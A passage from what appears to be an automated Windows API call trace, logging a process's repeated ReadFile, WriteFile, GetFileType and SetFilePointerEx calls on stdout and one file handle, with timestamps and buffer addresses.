(hFile=0x50) returned 0x1 [0218.267] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0218.267] WriteFile (in: hFile=0x50, lpBuffer=0x16ef04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef04*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.267] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.267] GetFileType (hFile=0x50) returned 0x1 [0218.267] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.267] WriteFile (in: hFile=0x50, lpBuffer=0x16ef54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef54*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.268] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.268] GetFileType (hFile=0x50) returned 0x1 [0218.268] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.268] WriteFile (in: hFile=0x50, lpBuffer=0x16efa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16efa4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.268] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.268] GetFileType (hFile=0x50) returned 0x1 [0218.268] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.268] WriteFile (in: hFile=0x50, lpBuffer=0x16eff4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eff4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.268] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.268] GetFileType (hFile=0x50) returned 0x1 [0218.268] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.268] WriteFile (in: hFile=0x50, lpBuffer=0x16f044*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f044*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.268] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.268] GetFileType (hFile=0x50) returned 0x1 [0218.268] _get_osfhandle (_FileHandle=1) returned 0x50 
[0218.268] WriteFile (in: hFile=0x50, lpBuffer=0x16f094*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f094*, lpNumberOfBytesWritten=0x16e098*=0x20, lpOverlapped=0x0) returned 1 [0218.268] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.268] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e084 | out: lpNewFilePointer=0x0) returned 1 [0218.268] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.268] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.268] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.268] GetFileType (hFile=0x50) returned 0x1 [0218.268] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.268] GetFileType (hFile=0x50) returned 0x1 [0218.268] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.268] WriteFile (in: hFile=0x50, lpBuffer=0x16eeb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.268] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.268] GetFileType (hFile=0x50) returned 0x1 [0218.268] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.268] WriteFile (in: hFile=0x50, lpBuffer=0x16ef04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef04*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.269] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.269] GetFileType (hFile=0x50) returned 0x1 [0218.269] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.269] WriteFile (in: hFile=0x50, lpBuffer=0x16ef54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef54*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 
[0218.269] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.269] GetFileType (hFile=0x50) returned 0x1 [0218.269] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.269] WriteFile (in: hFile=0x50, lpBuffer=0x16efa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16efa4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.269] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.269] GetFileType (hFile=0x50) returned 0x1 [0218.269] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.269] WriteFile (in: hFile=0x50, lpBuffer=0x16eff4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eff4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.269] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.269] GetFileType (hFile=0x50) returned 0x1 [0218.269] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.269] WriteFile (in: hFile=0x50, lpBuffer=0x16f044*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f044*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.269] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.269] GetFileType (hFile=0x50) returned 0x1 [0218.269] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.269] WriteFile (in: hFile=0x50, lpBuffer=0x16f094*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f094*, lpNumberOfBytesWritten=0x16e098*=0x20, lpOverlapped=0x0) returned 1 [0218.269] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.269] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e084 | out: lpNewFilePointer=0x0) returned 1 [0218.269] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.269] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, 
lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.269] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.269] GetFileType (hFile=0x50) returned 0x1 [0218.269] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.270] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.270] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.270] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.270] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.270] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.270] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.270] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.270] ReadFile (in: hFile=0x58, 
lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.270] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.270] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.270] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.271] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.271] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.271] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.271] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.271] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.271] ReadFile 
(in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.271] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.271] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.271] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.271] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.271] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.272] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.272] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.272] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 
[0218.272] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.272] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.272] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.272] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.272] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.272] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.272] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.272] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.273] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, 
lpOverlapped=0x0) returned 1 [0218.273] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.273] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.273] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.273] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.273] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.273] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.273] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.273] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.273] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, 
lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.273] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.274] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.274] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.274] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.274] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.274] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.274] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.274] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.274] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: 
lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.274] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.274] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.274] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.274] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.275] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.275] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.275] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.275] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.275] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, 
lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.275] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.275] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.275] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.275] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.275] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.275] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.275] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.276] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.276] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.276] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.276] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.276] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.276] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.276] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, 